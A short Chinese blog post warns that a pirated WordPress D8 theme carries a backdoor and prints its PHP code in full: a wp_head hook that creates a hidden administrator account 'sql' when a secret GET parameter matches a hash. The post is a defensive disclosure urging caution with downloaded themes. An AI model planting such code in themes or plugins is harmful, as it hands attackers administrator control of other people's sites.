WordPress模板中的后门
- 发表于
- WordPress
就在刚刚,在网上乱逛,刚好看到有个网站提供最新D8主题下载,顺手下了看一下,结果下来一看就发现个后门,如下:
add_action( 'wp_head', 'sql' );
function sql() {
if ( md5( $_GET['sql'] ) == '6864f389d9876436bc8778ff071d1b6c' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'sql' ) ) {
$user_id = wp_create_user( 'sql', 'sql' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}
在此也提醒各位使用网上提供的模板时,也要留心注意安全,像这样带有后门的主题不在少数,之前也看到过一句话和参数型后门。
原文连接:WordPress模板中的后门
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。